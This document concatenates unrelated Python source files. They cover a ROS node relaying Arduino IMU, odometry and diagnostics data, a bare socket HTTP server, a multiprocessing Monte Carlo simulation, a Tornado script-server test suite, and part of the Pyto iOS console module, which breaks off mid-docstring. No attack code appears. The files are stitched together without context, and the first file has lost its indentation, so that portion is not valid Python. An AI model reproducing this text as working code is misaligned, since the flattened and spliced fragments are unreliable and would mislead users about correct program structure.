# """
# Automatically called once after the first diagnostic message is received.
# Per Adafruit's documentation:
# "One thing to keep in mind though is that the sensor isn't necessarily 'plug and play' with
# loading the calibration data, in particular the magnetometer needs to be recalibrated even if
# the offsets are loaded. The magnetometer calibration is very dynamic so saving the values
# once might"
# """
# try:
# fn = self.imu_calibration_filename
# if os.path.isfile(fn):
# rospy.loginfo('Loading imu calibration %s...' % fn)
# with open(fn, 'r') as fin:
# msg = pickle.load(fin)
# rospy.loginfo('Sending calibration:')
# rospy.loginfo(msg)
# self.imu_calibration_load_pub.publish(msg)
# self.imu_calibration_loaded = True
# self.imu_calibration_loaded_time = rospy.Time.now()
# rospy.loginfo('Sent.')
# else:
# rospy.loginfo('No saved imu calibration.')
# except Exception as exc:
# traceback.print_exc()
# finally:
# self.imu_calibration_loaded = True
def on_head_pan_degrees(self, msg):
"""
Re-publishes the pan angle as a standard JointState message.
"""
# rospy.loginfo('pan: %s' % msg.data)
with self._joint_pub_lock:
self.last_pan_angle = msg.data*pi/180.
self.received_angles = True
self.publish_joints()
def on_head_tilt_degrees(self, msg):
"""
Re-publishes the tilt angle as a standard JointState message.
"""
# rospy.loginfo('tilt: %s' % msg.data)
with self._joint_pub_lock:
self.last_tilt_angle = msg.data*pi/180.
self.received_angles = True
self.publish_joints()
def publish_joints_thread(self):
time.sleep(3)
while 1:
if self.received_angles:
self.publish_joints()
time.sleep(1)
def publish_joints(self):
if self.last_tilt_angle is None:
rospy.logwarn('No tilt angle, aborting joint publish.')
return
if self.last_pan_angle is None:
rospy.logwarn('No pan angle, aborting joint publish.')
return
with self._joint_pub_lock:
joint_state = JointState()
joint_state.header = Header()
joint_state.header.stamp = rospy.Time.now()
joint_state.name = [
c.FOOTPRINT_TO_TORSO_JOINT,
c.TORSO_TO_NECK_JOINT,
c.NECK_TO_HEAD_JOINT,
c.HEAD_TO_CAMERA_JOINT,
]
joint_state.position = [
0,
self.last_pan_angle,
self.last_tilt_angle,
0,
]
joint_state.velocity = []
joint_state.effort = []
self.joint_pub.publish(joint_state)
def on_power_shutdown(self, msg):
rospy.loginfo('Received shutdown signal. Issuing halt command in 3 seconds...')
try:
say(c.SYSTEM_SHUTDOWN_SPEECH)
except Exception as exc: # pylint: disable=broad-except
rospy.logerr('Unable to speak about shutdown: %s', exc)
time.sleep(3)
os.system('sudo halt')
# After halt is performed, all ROS nodes will be killed.
# The torso Arduino will then wait a few seconds to allow Linux to clean up all processes, and then it will kill all system power.
# See the deadman flag that triggers the call to power_controller.shutdown().
# def on_imu_calibration_save(self, msg):
# #print('Received imu calibration:', msg)
# if sum(msg.data) == 0:
# rospy.logwarn('Ignoring blank calibration.')
# self.load_imu_calibration()
# return
# fn = self.imu_calibration_filename
# with open(fn, 'w') as fout:
# pickle.dump(msg, fout)
def on_imu_relay(self, msg):
parts = msg.data.split(':')
# Validate type.
typ = parts[0]
        assert typ in ('a', 'e', 'g'), 'Invalid typ: %s' % typ
# Convert the integers to the original floats.
nums = ltof(parts[1:])
for num, axis in zip(nums, 'xyz'):
self._imu_data['%s%s' % (typ, axis)] = num
# If we've received the final segment, re-publish the complete IMU message.
if typ == 'a':
# https://docs.ros.org/api/sensor_msgs/html/msg/Imu.html
imu_msg = Imu()
imu_msg.header = Header()
imu_msg.header.stamp = rospy.Time.now()
imu_msg.header.frame_id = c.BASE_LINK #TODO
            # Our sensor returns Euler angles in degrees, but ROS requires radians,
            # so convert before building the quaternion.
            # http://answers.ros.org/question/69754/quaternion-transformations-in-python/
            roll = self._imu_data['ex']*pi/180.
            pitch = self._imu_data['ey']*pi/180.
            yaw = self._imu_data['ez']*pi/180.
quaternion = tf.transformations.quaternion_from_euler(roll, pitch, yaw)
imu_msg.orientation.x = quaternion[0]
imu_msg.orientation.y = quaternion[1]
imu_msg.orientation.z = quaternion[2]
imu_msg.orientation.w = quaternion[3]
imu_msg.orientation_covariance = [1, 0.001, 0.001, 0.001, 1, 0.001, 0.001, 0.001, 1]
imu_msg.angular_velocity.x = self._imu_data['gx']
imu_msg.angular_velocity.y = self._imu_data['gy']
imu_msg.angular_velocity.z = self._imu_data['gz']
imu_msg.angular_velocity_covariance = [1, 0.001, 0.001, 0.001, 1, 0.001, 0.001, 0.001, 1]
imu_msg.linear_acceleration.x = self._imu_data['ax']
imu_msg.linear_acceleration.y = self._imu_data['ay']
imu_msg.linear_acceleration.z = self._imu_data['az']
imu_msg.linear_acceleration_covariance = [1, 0.001, 0.001, 0.001, 1, 0.001, 0.001, 0.001, 1]
self.imu_pub.publish(imu_msg)
def on_diagnostics_relay(self, msg, prefix):
"""
The Arduino has limited RAM and an even more limited serial buffer, so it can't send complex ROS structures like DiagnosticArrays.
So instead, it publishes diagnostic data via a key/value pair formatted in a simple string,
which we convert to a proper diagnostic message.
"""
#print('diagnostics.msg:', msg)
self.diagnostics_msg_count += 1
# if (rospy.Time.now() - self.imu_calibration_loaded_time).secs >= 300:
# self.load_imu_calibration()
# Aggregate single-character messages into a complete message.
# if not msg.data:
# #print('Received empty message.')
# return
# elif msg.data[0] == '^':
# #print('Received message start.')
# self.diagnostics_buffer = []
# return
# elif msg.data[0] == '$':
# #print('Received message end.')
# msg.data = ''.join(self.diagnostics_buffer)
# else:
        # #print('Received %i chars.' % len(msg.data))
# self.diagnostics_buffer.append(msg.data)
# return
# Extract parts.
# print('Message length:', len(msg.data))
# print('Message data:', msg.data)
parts = msg.data.split(':')
if len(parts) < 2:
            rospy.logerr('Malformed diagnostics message: %s', msg.data)
return
# Complete name part.
name = '%s: %s' % (prefix, parts[0].strip())
# Complete level part.
try:
level = int(parts[1]) # OK|WARN|ERROR|STALE
assert level in range(4)
except (TypeError, ValueError, AssertionError) as exc:
rospy.logerr('Malformed level: "%s"', parts[1])
return
# Complete message part.
message = ''
if len(parts) >= 3:
message = parts[2].strip()
if message == '?':
message = ''
if not message:
# If not given, default the message to the name equivalent of the level.
message = status_id_to_name.get(level, '')
# Construct and send diagnostics array.
# http://docs.ros.org/api/diagnostic_msgs/html/msg/DiagnosticStatus.html
array = DiagnosticArray()
array.status = [
DiagnosticStatus(name=name, level=level, message=message)
]
with self._lock:
self.diagnostics_pub.publish(array)
def on_odometry_relay(self, msg):
parts = msg.data.split(':')
if len(parts) < 5:
            rospy.logerr('Malformed odometry message: %s', msg.data)
return
# Validate type.
typ = parts[0]
assert typ in (V0, V1), 'Invalid type: %s' % typ
# Validate numbers.
nums = ltof(parts[1:])
# Save type parts.
if typ == V0:
# Position.
# x,y,z,th
self._odometry_v0 = nums
else:
# Velocity.
# vx,vy,vz,vth
self._odometry_v1 = nums
# Combine and publish a complete odometry message on the receipt of the last part.
if typ == V1:
current_time = rospy.Time.now()
# print('position:', self._odometry_v0)
x, y, z, th = self._odometry_v0
# print('velocity:', self._odometry_v1)
vx, vy, vz, vth = self._odometry_v1
# since all odometry is 6DOF we'll need a quaternion created from yaw
#geometry_msgs::Quaternion odom_quat = tf::createQuaternionMsgFromYaw(th);
odom_quat = Quaternion(*tf.transformations.quaternion_from_euler(0, 0, th))
# https://docs.ros.org/kinetic/api/nav_msgs/html/msg/Odometry.html
msg = Odometry()
msg.header.stamp = current_time
msg.header.frame_id = c.ODOM
msg.child_frame_id = c.BASE_LINK
msg.pose.pose.position = Point(x, y, z)
msg.pose.pose.orientation = odom_quat
msg.pose.covariance = [
1, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 1, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 1, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 1, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 1, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 1,
]
msg.twist.twist.linear.x = vx
msg.twist.twist.linear.y = vy
msg.twist.twist.angular.z = vth
msg.twist.covariance = [
1, 0.001, 0.001, 0.001, 0.001, 0.001,
0.001, 1, 0.001, 0.001, 0.001, 0.001,
0.001, 0.001, 1, 0.001, 0.001, 0.001,
0.001, 0.001, 0.001, 1, 0.001, 0.001,
0.001, 0.001, 0.001, 0.001, 1, 0.001,
0.001, 0.001, 0.001, 0.001, 0.001, 1,
]
# publish the odometry message
self.odometry_pub.publish(msg)
with self._odom_lock:
self.pos = (
msg.pose.pose.position.x,
msg.pose.pose.position.y,
msg.pose.pose.position.z,
)
self.ori = (
msg.pose.pose.orientation.x,
msg.pose.pose.orientation.y,
msg.pose.pose.orientation.z,
msg.pose.pose.orientation.w,
)
# first, we'll publish the transform over tf
#geometry_msgs::TransformStamped odom_trans;
# odom_trans = TransformStamped()
# odom_trans.header.stamp = self.current_time
# odom_trans.header.frame_id = self.frame_id
# odom_trans.child_frame_id = self.child_frame_id
# odom_trans.transform.translation.x = self.x
# odom_trans.transform.translation.y = self.y
# odom_trans.transform.translation.z = self.z
# odom_trans.transform.rotation = odom_quat
# send the transform
self.tf_br.sendTransform(self.pos, self.ori, msg.header.stamp, msg.child_frame_id, msg.header.frame_id)
#self.tf2_br.sendTransform(odom_trans)
if __name__ == '__main__':
ArduinoRelay()
|
server.py | import os, sys
sys.path.append("/Users/Pichau/Documents/projects/Http-Server/src/server/http")
import socket
import logging
import threading
import conf
from random import randint
from request import RequestParser, Path
from errors import HttpBaseError
from datetime import datetime
class SocketServer(object):
@staticmethod
def http(port, host='0.0.0.0'):
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind((host, port))
server_socket.listen(1)
return server_socket
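# Usage sketch (assumptions: the port is free and the caller runs the accept loop):
#   sock = SocketServer.http(8080)
#   conn, addr = sock.accept()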
class HttpBaseServer:
def __init__(self, port, paths):
self.socket = SocketServer.http(port=port)
self.path = Path(local=paths)
print(f"[{datetime.now()}] STARTED SERVER")
def serve_forever(self) -> None:
while True:
try:
client_connection, client_address = self.socket.accept()
print(f"[{datetime.now()}] CONNECTION RECEIVED FROM {client_address[0]}")
request = client_connection.recv(1024).decode()
response = self.route(request=request)
client_connection.sendall(response.encode())
threading.Thread(target=client_connection.close, args=()).start()
except KeyboardInterrupt:
self.socket.close()
break
print(f"[{datetime.now()}] CLOSED SERVER")
    def route(self, request) -> str:
parser = RequestParser(request=request)
request_path = parser.path()
try:
return self.path.route(request_path)
except HttpBaseError as e:
return str(e)
if __name__=='__main__':
    route = {
        # NOTE: `Html` is not imported above; it is assumed to come from this
        # project's local http package (e.g. a response module).
        '/teste': str(Html(html_path='../../test/index.html', status='200 OK'))
    }
HttpBaseServer(port=8000, paths=route).serve_forever()
# server = HttpServer(8000).serve_forever()
# html_server = HtmlServe(8000).html('../../test/index.html').serve_forever() |
meanfield_montecarlo_multi.py | #!/usr/bin/env python3
import multiprocessing
import numpy
import sys
sys.path.append("..")
from meanfield_share import calc_meanfield_montecarlo
def calc_meanfield_multi(q,P,R,c,p,init,b,rand_seed):
numpy.random.seed(rand_seed)
overlap,cor=calc_meanfield_montecarlo(P,R,c,p,init,b)
q.put((c,overlap,cor))
if __name__=="__main__":
#parameters
P=71
R=10**6
Nrepeat=5
p=float(sys.argv[1])
maxparam=3
param_mesh=0.05
tmp=int(numpy.round(maxparam/param_mesh))
param_arr=list(map(lambda x:x*param_mesh, range(-tmp,tmp+1)))
param_arr=numpy.around(param_arr, decimals=2)
Nparam=len(param_arr)
Nprocess=40
Phalf=int((P+1)//2)
init=numpy.zeros(P)
init[Phalf-1]=1.0
ext_input=numpy.zeros(P)
#start parallel calculation -> get results
que=multiprocessing.Queue()
process_arr=[]
results_overlap=[]
results_cor=[]
process_num=0
rand_seed=0
for param_count in range(Nparam):
for ite in range(Nrepeat):
param=param_arr[param_count]
print(param,ite)
process_arr.append(multiprocessing.Process(target=calc_meanfield_multi, args=(que,P,R,param,p,init,ext_input,rand_seed)))
rand_seed+=1
process_arr[-1].start()
process_num+=1
if process_num>=Nprocess or (param_count+1==Nparam and ite+1==Nrepeat):
for i in range(process_num):
process_arr[i].join()
if que.empty():
print("Nothing was returned from child processes.")
exit()
while not que.empty():
tmp=que.get()
results_overlap.append(numpy.concatenate([tmp[0:1],tmp[1]], axis=0))
results_cor.append(numpy.concatenate([tmp[0:1],tmp[2]], axis=0))
process_arr.clear()
process_num=0
#save to file
numpy.savetxt("param_val.csv", param_arr, delimiter=",")
numpy.savetxt("overlap.csv", results_overlap, delimiter=",")
numpy.savetxt("cor.csv", results_cor, delimiter=",")
|
server_test.py | import json
import os
import threading
import traceback
from asyncio import set_event_loop_policy
from unittest import TestCase
from unittest.mock import patch, MagicMock
import requests
from parameterized import parameterized
from tornado.ioloop import IOLoop
from tornado.web import create_signed_value
from auth.authorization import Authorizer, ANY_USER, EmptyGroupProvider
from config.config_service import ConfigService
from features.file_download_feature import FileDownloadFeature
from features.file_upload_feature import FileUploadFeature
from files.user_file_storage import UserFileStorage
from model.server_conf import ServerConfig, XSRF_PROTECTION_TOKEN, XSRF_PROTECTION_HEADER
from tests import test_utils
from tests.test_utils import MockAuthenticator
from utils import os_utils, env_utils, file_utils
from web import server
def is_unsupported_ioloop_exception(e):
stacktrace = traceback.extract_tb(e.__traceback__)
failed_method = stacktrace[-1].name
return failed_method == 'add_reader'
class ServerTest(TestCase):
def test_init_when_linux(self):
test_utils.set_linux()
try:
self.start_server(12345, '127.0.0.1')
if self.requires_explicit_ioloop_factory:
self.fail('Server should NOT be startable on current environment')
else:
self.check_server_running()
except NotImplementedError as e:
if self.requires_explicit_ioloop_factory and is_unsupported_ioloop_exception(e):
return
raise
@patch('utils.env_utils.sys.version_info', (3, 8, 0))
def test_init_when_windows_and_python_3_8(self):
test_utils.set_win()
try:
self.start_server(12345, '127.0.0.1')
self.check_server_running()
except AttributeError:
# Linux/Mac doesn't support windows specific classes
if not self.windows:
return
raise
@patch('utils.env_utils.sys.version_info', (3, 7, 0))
def test_init_when_windows_and_python_3_7(self):
test_utils.set_win()
try:
self.start_server(12345, '127.0.0.1')
if self.requires_explicit_ioloop_factory:
self.fail('Server should NOT be startable on current environment')
else:
self.check_server_running()
except NotImplementedError as e:
if self.requires_explicit_ioloop_factory and is_unsupported_ioloop_exception(e):
return
raise
def test_get_scripts(self):
self.start_server(12345, '127.0.0.1')
test_utils.write_script_config({'name': 's1'}, 's1', self.runners_folder)
test_utils.write_script_config({'name': 's2', 'group': 'Xyz'}, 's2', self.runners_folder)
test_utils.write_script_config({'name': 's3'}, 's3', self.runners_folder)
response = self.request('GET', 'http://127.0.0.1:12345/scripts')
self.assertCountEqual([
{'name': 's1', 'group': None},
{'name': 's2', 'group': 'Xyz'},
{'name': 's3', 'group': None}],
response['scripts'])
@parameterized.expand([
('X-Forwarded-Proto',),
('X-Scheme',)])
def test_redirect_honors_protocol_header(self, header):
self.start_server(12345, '127.0.0.1')
response = self._user_session.get('http://127.0.0.1:12345/',
allow_redirects=False,
headers={header: 'https'})
self.assertRegex(response.headers['Location'], '^https')
def test_xsrf_protection_when_token(self):
self.start_server(12345, '127.0.0.1')
test_utils.write_script_config({'name': 's1', 'script_path': 'ls'}, 's1', self.runners_folder)
response = self._user_session.get('http://127.0.0.1:12345/scripts')
xsrf_token = response.cookies.get('_xsrf')
start_response = self._user_session.post(
'http://127.0.0.1:12345/executions/start',
data={'__script_name': 's1'},
files=[('notafile', None)],
headers={'X-XSRFToken': xsrf_token},
cookies=response.cookies
)
self.assertEqual(start_response.status_code, 200)
self.assertEqual(start_response.content, b'3')
def test_xsrf_protection_when_token_failed(self):
self.start_server(12345, '127.0.0.1')
test_utils.write_script_config({'name': 's1', 'script_path': 'ls'}, 's1', self.runners_folder)
response = self._user_session.get('http://127.0.0.1:12345/scripts')
start_response = self._user_session.post(
'http://127.0.0.1:12345/executions/start',
data={'__script_name': 's1'},
files=[('notafile', None)],
headers={'X-Requested-With': 'XMLHttpRequest'},
cookies=response.cookies
)
self.assertEqual(start_response.status_code, 403)
def test_xsrf_protection_when_header(self):
self.start_server(12345, '127.0.0.1', xsrf_protection=XSRF_PROTECTION_HEADER)
test_utils.write_script_config({'name': 's1', 'script_path': 'ls'}, 's1', self.runners_folder)
self._user_session.get('http://127.0.0.1:12345/scripts')
start_response = self._user_session.post(
'http://127.0.0.1:12345/executions/start',
data={'__script_name': 's1'},
files=[('notafile', None)],
headers={'X-Requested-With': 'XMLHttpRequest'},
)
self.assertEqual(start_response.status_code, 200)
self.assertEqual(start_response.content, b'3')
def test_get_script_code(self):
self.start_server(12345, '127.0.0.1')
script_path = test_utils.create_file('my_script.py')
test_utils.write_script_config({'name': 's1', 'script_path': script_path}, 's1', self.runners_folder)
response = self.request('get',
'http://127.0.0.1:12345/admin/scripts/s1/code',
self._admin_session
)
self.assertEqual({'code': 'test text', 'file_path': os.path.abspath(script_path)},
response)
def test_create_script_config(self):
self.start_server(12345, '127.0.0.1')
xsrf_token = self.get_xsrf_token(self._admin_session)
response = self._admin_session.post(
'http://127.0.0.1:12345/admin/scripts',
data={'filename': 'whatever', 'config': json.dumps({
'name': 'test conf',
'script': {
'mode': 'upload_script',
'path': 'whatever'
}
})},
files={'uploadedScript': ('my.py', b'script content')},
headers={'X-XSRFToken': xsrf_token},
)
self.assertEqual(200, response.status_code)
expected_script_path = os.path.join(test_utils.temp_folder, 'conf', 'scripts', 'my.py')
conf_response = self.request('get', 'http://127.0.0.1:12345/admin/scripts/test%20conf',
self._admin_session)
self.assertEqual({'config': {'name': 'test conf',
'script_path': expected_script_path},
'filename': 'test_conf.json'},
conf_response)
script_content = file_utils.read_file(expected_script_path)
self.assertEqual('script content', script_content)
def test_update_script_config(self):
self.start_server(12345, '127.0.0.1')
xsrf_token = self.get_xsrf_token(self._admin_session)
script_path = test_utils.create_file('my_script.py')
test_utils.write_script_config({'name': 's1', 'script_path': script_path}, 's1', self.runners_folder)
response = self._admin_session.put(
'http://127.0.0.1:12345/admin/scripts',
data={'filename': 's1.json', 'config': json.dumps({
'name': 'new name',
'script': {
'mode': 'new_code',
'path': script_path,
'code': 'abcdef'
}
})},
headers={'X-XSRFToken': xsrf_token},
)
self.assertEqual(200, response.status_code)
conf_response = self.request('get', 'http://127.0.0.1:12345/admin/scripts/new%20name',
self._admin_session)
self.assertEqual({'config': {'name': 'new name',
'script_path': script_path},
'filename': 's1.json'},
conf_response)
script_content = file_utils.read_file(script_path)
self.assertEqual('abcdef', script_content)
@staticmethod
def get_xsrf_token(session):
response = session.get('http://127.0.0.1:12345/admin/scripts')
return response.cookies.get('_xsrf')
def request(self, method, url, session=None):
if session is None:
session = self._user_session
response = session.request(method, url)
self.assertEqual(200, response.status_code, 'Failed to execute request: ' + response.text)
return response.json()
def check_server_running(self):
response = self._user_session.get('http://127.0.0.1:12345/conf')
self.assertEqual(response.status_code, 200)
def start_server(self, port, address, *, xsrf_protection=XSRF_PROTECTION_TOKEN):
file_download_feature = FileDownloadFeature(UserFileStorage(b'some_secret'), test_utils.temp_folder)
config = ServerConfig()
config.port = port
config.address = address
config.xsrf_protection = xsrf_protection
config.max_request_size_mb = 1
authorizer = Authorizer(ANY_USER, ['admin_user'], [], ['admin_user'], EmptyGroupProvider())
execution_service = MagicMock()
execution_service.start_script.return_value = 3
cookie_secret = b'cookie_secret'
server.init(config,
MockAuthenticator(),
authorizer,
execution_service,
MagicMock(),
MagicMock(),
ConfigService(authorizer, self.conf_folder),
MagicMock(),
FileUploadFeature(UserFileStorage(cookie_secret), test_utils.temp_folder),
file_download_feature,
'cookie_secret',
None,
self.conf_folder,
start_server=False)
self.start_loop()
self._user_session = requests.Session()
self._user_session.cookies['username'] = create_signed_value(cookie_secret, 'username', 'normal_user') \
.decode('utf8')
self._admin_session = requests.Session()
self._admin_session.cookies['username'] = create_signed_value(cookie_secret, 'username', 'admin_user') \
.decode('utf8')
def start_loop(self):
io_loop = IOLoop.current()
self.ioloop_thread = threading.Thread(target=io_loop.start)
self.ioloop_thread.start()
def setUp(self) -> None:
super().setUp()
test_utils.setup()
self.requires_explicit_ioloop_factory = os_utils.is_win() and env_utils.is_min_version('3.8')
self.windows = os_utils.is_win()
self.conf_folder = test_utils.create_dir(os.path.join('conf'))
self.runners_folder = os.path.join(self.conf_folder, 'runners')
def tearDown(self) -> None:
super().tearDown()
io_loop = IOLoop.current()
try:
server._http_server.stop()
except KeyError:
for socket in server._http_server._sockets.values():
socket.close()
server._http_server._sockets.clear()
self.kill_ioloop(io_loop)
test_utils.cleanup()
def kill_ioloop(self, io_loop):
if not io_loop or not io_loop.asyncio_loop.is_running():
return
io_loop.add_callback(io_loop.stop)
self.ioloop_thread.join(timeout=50)
io_loop.close()
set_event_loop_policy(None)
|
console.py | # -*- coding: utf-8 -*-
"""
This module gives access to the console.
"""
if __host__ is not widget:
from rubicon.objc import *
from _get_variables_hierarchy import get_variables_hierarchy
from code import interact
import stopit
import pdb
if __platform__ is iOS:
import _codecompletion
from pyto import *
from pyto import __isMainApp__
if __host__ is not widget:
import builtins
import importlib.util
import os
import sys
import traceback
import threading
import time
# MARK: REPL
__repl_code__ = {}
__continue_code_completion__ = True
__isREPLAskingForInput__ = False
def __repl_raw_input__(prompt=None):
current_thread = threading.current_thread()
ConsoleViewController.visible.suggestions = []
ConsoleViewController.visible.completions = []
ConsoleViewController.visible.reloadSuggestions()
    global __isREPLAskingForInput__  # without this, the assignments below would only create a local
    __isREPLAskingForInput__ = True
Python.shared.isREPLAskingForInput = True
def code_completion():
prompt_ = ""
while True:
def continue_():
return (not threading.current_thread() in ignoredThreads and not current_thread in ignoredThreads)
if not continue_():
break
if __platform__ is iOS and __host__ is not widget and prompt_ != str(ConsoleViewController.visible.prompt):
prompt_ = str(ConsoleViewController.visible.prompt)
code = ";\n"+__repl_code__[current_thread]+"\n"+prompt_+";"
suggestions = []
completions = []
for key, value in _codecompletion.suggestionsForCode(code).items():
suggestions.append(key)
completions.append(value)
if continue_():
ConsoleViewController.visible.completions = completions
ConsoleViewController.visible.suggestions = suggestions
else:
break
else:
continue
if not current_thread in __repl_code__:
__repl_code__[current_thread] = "\n"
code_completion_thread = None
if __platform__ is iOS and ConsoleViewController.visible != None:
code_completion_thread = threading.Thread(target=code_completion, args=())
code_completion_thread.start()
result = ""
exc = None
try:
result = input(prompt)
except Exception as e:
exc = e
__isREPLAskingForInput__ = False
Python.shared.isREPLAskingForInput = False
if __platform__ is iOS and ConsoleViewController.visible != None:
ConsoleViewController.visible.suggestions = []
ConsoleViewController.visible.completions = []
        ConsoleViewController.visible.reloadSuggestions()
if exc != None:
raise exc
if __platform__ is iOS and ConsoleViewController.visible != None:
ignoredThreads.append(code_completion_thread)
__repl_code__[current_thread] += "\n"+result
return result
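# Note: interact(readfunc=__repl_raw_input__) in __runREPL__ below makes
# code.InteractiveConsole call this function for every prompt, so
# __repl_code__ accumulates a per-thread transcript of the REPL session for
# the code-completion thread above.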
def __runREPL__():
if __host__ is widget:
return
os.system = Python.shared.system
sys.argv = ['']
Python.shared.isScriptRunning = True
interact(readfunc=__repl_raw_input__)
# MARK: - Running
__script__ = None
__is_loop_running__ = False
__inspector_thread__ = None
__i__ = 0
__breakpoints__ = []
__are_breakpoints_set__ = True
__should_inspect__ = False
def run_script(path, replMode=False, debug=False, breakpoints=[]):
"""
Run the script at given path catching exceptions.
This function should only be used internally by Pyto.
Args:
path: The path of the script.
replMode: If set to `True`, errors will not be handled.
debug: Set to `True` for debugging.
breakpoints: Lines to break if debugging.
"""
if __platform__ is iOS:
python = Python.shared
sys.argv = [path]
for arg in python.args:
if arg != "":
sys.argv.append(str(arg))
def run() -> None:
if __platform__ is iOS:
Python.shared.isScriptRunning = True
os.system = Python.shared.system
directory = os.path.expanduser(os.path.dirname(path))
os.chdir(directory)
sys.path.insert(0, directory)
try:
global __script__
spec = importlib.util.spec_from_file_location("__main__", path)
__script__ = importlib.util.module_from_spec(spec)
if debug and __platform__ is iOS and __host__ is not widget:
try:
console
except:
import console
console.__are_breakpoints_set__ = False
console.__should_inspect__ = True
console.__breakpoints__ = breakpoints
console.__i__ = -1
old_input = input
def debugger_input(prompt):
try:
console
except:
import console
if not console.__are_breakpoints_set__:
breakpoints = console.__breakpoints__
console.__i__ += 1
if len(breakpoints) < console.__i__:
console.__are_breakpoints_set__ = True
return ""
try:
breakpoints[console.__i__+1]
except:
console.__are_breakpoints_set__ = True
return "b "+str(breakpoints[console.__i__])
elif not console.__should_inspect__:
console.__should_inspect__ = True
return old_input(prompt)
else:
console.__should_inspect__ = False
return "from pyto import ConsoleViewController; from _get_variables_hierarchy import get_variables_hierarchy; ConsoleViewController.variables = get_variables_hierarchy(locals())"
if len(breakpoints) > 0:
builtins.input = debugger_input
pdb.main(["pdb", path])
builtins.input = old_input
else:
spec.loader.exec_module(__script__)
except SystemExit:
pass
except KeyboardInterrupt:
pass
except Exception as e:
if __platform__ is iOS and not __isMainApp__() or replMode:
print(traceback.format_exc())
if not replMode:
Python.shared.fatalError(str(e))
else:
exc_type, exc_obj, exc_tb = sys.exc_info()
extracts = traceback.extract_tb(sys.exc_info()[2])
count = len(extracts)
lineNumber = -1
fileName = path
for i, extract in enumerate(extracts):
if extract[0] == fileName:
lineNumber = extract[1]
break
count -= 1
if (type(e) == SyntaxError): # The last word in a `SyntaxError` exception is the line number
lineNumber = [int(s) for s in (str(e)[:-1]).split() if s.isdigit()][-1]
if __platform__ is iOS:
Python.shared.errorType = exc_type.__name__
Python.shared.errorReason = str(e)
EditorSplitViewController.visible.editor.showErrorAtLine(lineNumber)
elif __platform__ is macOS:
print("Pyto.error_at_line;"+str(lineNumber)+";")
error = traceback.format_exc(limit=-count)
if __platform__ is iOS:
PyOutputHelper.printError(error)
sys.path.remove(directory)
else:
sys.stderr.write(error+"\n")
if debug:
pdb.post_mortem(exc_tb)
if __platform__ is iOS and __isMainApp__():
EditorViewController.runningLine = 0
ReviewHelper.shared.launches = ReviewHelper.shared.launches+1
ReviewHelper.shared.requestReview()
thread = threading.Thread(target=run, args=())
def inspector_loop():
time.sleep(1)
        while thread.is_alive():
if __platform__ is iOS and not ConsoleViewController.isMainLoopRunning:
try:
vars = get_variables_hierarchy(__script__)
if vars != ConsoleViewController.variables:
ConsoleViewController.variables = vars
except:
pass
time.sleep(1)
def interruption_loop():
        while thread.is_alive():
sys.__stdout__.write(str(Python.shared._isScriptRunning)+"\n")
if not Python.shared._isScriptRunning or Python.shared._interrupt:
target_tid = 0
for tid, tobj in threading._active.items():
if tobj is thread:
found = True
target_tid = tid
break
if Python.shared._interrupt:
stopit.async_raise(target_tid, KeyboardInterrupt)
elif not Python.shared._isScriptRunning:
stopit.async_raise(target_tid, SystemExit)
Python.shared._interrupt = False
                if thread.is_alive():
Python.shared._isScriptRunning = True
time.sleep(1)
if __platform__ is iOS:
Python.shared.isScriptRunning = True
Python.shared._isScriptRunning = True
if __host__ is not widget and __platform__ is iOS and not debug:
inspector_thread = threading.Thread(target=inspector_loop, args=())
inspector_thread.start()
#interruption_thread = threading.Thread(target=interruption_loop, args=())
#interruption_thread.start()
if __platform__ is iOS:
thread.start()
else:
run()
if __host__ is not widget and __platform__ is iOS:
interruption_loop()
if __platform__ is iOS:
sys.__stdout__.write("Execution finished\n")
try:
vars = get_variables_hierarchy(__script__)
if __platform__ is iOS:
if vars != ConsoleViewController.variables:
ConsoleViewController.variables = vars
elif __platform__ is macOS:
# TODO: Mac support
pass
except:
pass
if __platform__ is iOS:
Python.shared._isScriptRunning = False
Python.shared.isScriptRunning = False
return __script__
# MARK: - I/O
ignoredThreads = []
"""
All output and input request from these threads will be ignored.
"""
def __console__():
if __platform__ is iOS:
return ConsoleViewController.visible
else:
return
def clear():
"""
Clears the console.
"""
if threading.current_thread() in ignoredThreads:
return
if __platform__ is macOS:
print("Pyto.console.clear")
else:
__console__().clear()
time.sleep(0.1)
if __platform__ is iOS:
__PyInputHelper__ = PyInputHelper
def input(prompt=""):
"""
Requests input with given prompt.
Args:
prompt: Text printed before the user's input without a newline.
"""
if __host__ is widget:
return None
NSBundle = ObjCClass("NSBundle")
if NSBundle.mainBundle.bundlePath.pathExtension == "appex":
return None
if __platform__ is iOS:
if not __isREPLAskingForInput__ and ConsoleViewController.visible != None:
ConsoleViewController.visible.suggestions = []
ConsoleViewController.visible.completions = []
__PyInputHelper__.userInput = None
__PyInputHelper__.showAlertWithPrompt(prompt)
while __PyInputHelper__.userInput == None or threading.currentThread() in ignoredThreads:
continue
userInput = __PyInputHelper__.userInput
__PyInputHelper__.userInput = None
return str(userInput)
if __platform__ is iOS:
__PyOutputHelper__ = PyOutputHelper
def print(*objects, sep=None, end=None):
"""
    Prints to the Pyto console rather than to stdout. Works like the builtin `print` function but does not support printing to a custom file. Pyto captures stdout and stderr by default, so prefer the builtin function; this one is mainly for internal use.
"""
if sep is None:
sep = ' '
if end is None:
end = '\n'
array = map(str, objects)
__PyOutputHelper__.print(sep.join(array)+end)
# MARK: - Alerts
if __host__ is not widget:
if __platform__ is iOS:
PyAlert = PyAlert
"""
A class representing an alert.
Example:
alert = console.Alert.alertWithTitle("Hello", message="Hello World!")
alert.addAction("Ok")
alert.addCancelAction("Cancel")
if (alert.show() == "Ok"):
print("Good Bye!")
"""
class Alert:
"""
        A wrapper of the `PyAlert` Objective-C class on iOS and `NSAlert` on macOS, representing a UI alert.
"""
if __platform__ is iOS:
pyAlert = None
"""
The Objective-C representation.
"""
elif __platform__ is macOS:
nsAlert = None
"""
The Objective-C representation.
"""
def __init__(self):
if __platform__ is iOS:
self.pyAlert = PyAlert.alloc().init()
elif __platform__ is macOS:
from ctypes import cdll
cdll.LoadLibrary("/System/Library/Frameworks/Cocoa.framework/Versions/Current/Cocoa")
self.nsAlert = ObjCClass("NSAlert").alloc().init()
@staticmethod
def alertWithTitle(title, message):
"""
Creates an alert.
Args:
title: The title of the alert.
